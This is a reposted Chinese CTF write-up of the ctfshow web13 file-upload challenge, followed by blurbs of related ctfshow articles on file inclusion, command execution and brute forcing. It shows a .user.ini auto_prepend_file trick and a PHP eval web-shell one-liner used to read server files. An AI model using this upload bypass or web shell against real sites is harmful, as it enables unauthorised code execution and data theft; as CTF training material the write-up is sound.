ctfshow-web13 文件上传

7月前作者：Wcbddd 分类：Toy博客阅读(26) 违法举报

这篇具有很好参考价值的文章主要介绍了ctfshow-web13 文件上传。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x00 前言

CTF 加解密合集
CTF Web合集
网络安全知识库

文中工具皆可关注皓月当空w 公众号发送关键字工具获取

0x01 题目

ctfshow-web13 文件上传,web,CTF,web安全

0x02 Write Up

首先看到是一个上传页面，测试其他无果，遂进行目录遍历，发现upload.php.bak文件

ctfshow-web13 文件上传,web,CTF,web安全
可以看到这里的限制条件，大小，以及内容，这里可以使用.user.ini进行上传，具体参考：php user.ini详解

那么我们先上传.user.ini

auto_prepend_file=1.txt

然后上传1.txt，尝试使用get，但是没有生效，这里需要控制字符数量

<?php eval($_POST['a']);

上传好了之后，通过index.php进行访问

首先查看当前目录

ctfshow-web13 文件上传,web,CTF,web安全

然后通过highlight_file读取文件

ctfshow-web13 文件上传,web,CTF,web安全

以上文章来源地址https://www.toymoban.com/news/detail-673459.html

到了这里，关于ctfshow-web13 文件上传的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

ctfshow-web入门-信息收集

Ctrl+U或者F12 查看页面源代码. JS禁用F12，Ctrl+U查看源代码前端未泄露，抓包查看返回包发现Flag robots.txt文件泄露 phps源码泄露，phps存放着php源码,可通过尝试访问/index.phps读取,或者尝试扫描工具扫描读取 phps即为 PHP Source。访问index.phps下载phps文件查看flag 网站源

2024年02月05日
浏览(28)
《CTFshow-Web入门》01. Web 1~10

ctf - web入门 web1：网页源码查看。 web2：网页源码查看。 web3：burpsuite 抓包查看响应数据包。 web4：robots.txt 文件泄露后台地址。 web5：phps 文件泄露源码。 web6：网站备份压缩文件泄露源码。 web7：版本控制之 git 泄露源码。 web8：版本控制之 svn 泄露源码。 web9：vim 缓存信息泄露

2024年02月05日
浏览(51)
《CTFshow-Web入门》09. Web 81~90

ctf - web入门 web81：include() 利用，一句话木马之 Nginx 日志利用。 web82~86：include() 利用，条件竞争，利用 session 文件写入一句话木马。 web87：file_put_contents() 利用，伪协议 php://filter/ 。 web88：include() 利用，正则绕过，伪协议 data:// 。 web89：PHP 特性之 intval()。 web90：PHP 特性之

2024年02月10日
浏览(26)
《CTFshow-Web入门》07. Web 61~70

ctf - web入门 web61~70：post 请求之 eval() 利用。这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。以下解法随便挑一个即可。可能不同题会有部分函数被禁。 payload1 ： payload2 ： payload3 ： payload4 ：题目没变化。随便试一个函数。根据

2024年02月01日
浏览(34)
ctfshow-web入门-爆破wp

进入主页为登录框，随便输入信息用burp抓包，发现Authorization认证使用Base64加密传输，解密发现为刚才输入的信息右键发送至Intruder进行爆破，使用题目给出的字典进行爆破并添加变量添加前缀使用户名固定并用Base64加密传输，记得取消勾选url-encode，不然会转义Base64的\\\"=

2024年02月05日
浏览(36)
ctfshow-web入门——爆破（web21-web28）

1.bp工具的使用 bp爆破的大概步骤：抓包，Send to Intruder，Positions页面，add$（加入想要爆破的值），Payloads页面，Payload Options，Load，导入想跑的字典，点击Start attack custom iterator（自定义迭代器）模式： payload type选Custom iterrator，position1填admin，position2填: ,position3导入字典，按照

2024年02月04日
浏览(29)
ctfshow-Web入门-命令执行wp

简单的命令执行，使用/i模式过滤大小写flag，可以使用通配符绕过过滤。比上一题多过滤system与php，可以使用其他函数来执行命令，具体可以参考PHP中常见的命令执行函数与代码执行函数_-passthru-CSDN博客多过滤cat,sort,shell,\\\'.\\\',空格，\\\'\\\'\\\' cat,sort可用其他查询命令，如

2024年02月05日
浏览(66)
CTFShow-WEB入门篇命令执行详细Wp(29-40)

CTFShow 平台：https://ctf.show/ preg_match（）：函数执行一个正则表达式匹配。这里过滤了 flag/i 过滤的不是很多就两个所以方法有很多种 ctfshow{f6702830-5d6b-4cfb-9678-4ae7fa2ba198} 过滤了 flag、system、php 其实还可以使用上面的方法换一个命令执行函数即可。命令执行函数： passthru、she

2024年02月10日
浏览(31)
ctfshow--web入门--文件上传

目录 ctfshow--web入门--文件上传 web151(前端校验) web152(content-type) web153(.user.ini) web154(内容检测\\\'php\\\') web155(内容检测\\\'php\\\') web156(内容检测\\\'[\\\') web157(内容检测\\\'php\\\'\\\'[]\\\'\\\'{}\\\'\\\';\\\') web158(文件检测\\\'php\\\'\\\'{\\\'\\\'[\\\'\\\';\\\'\\\'log\\\') web159(日志包含) web160(日志空格检测) web161(日志文件头检测) web162web163(session包含) w

2024年02月14日
浏览(24)
CTFshow web(文件上传158-161）

web158 知识点： auto_append_file 是 PHP 配置选项之一，在 PHP 脚本执行结束后自动追加执行指定的文件。当 auto_append_file 配置被设置为一个文件路径时，PHP 将在执行完脚本文件的所有代码后，

2024年02月21日
浏览(29)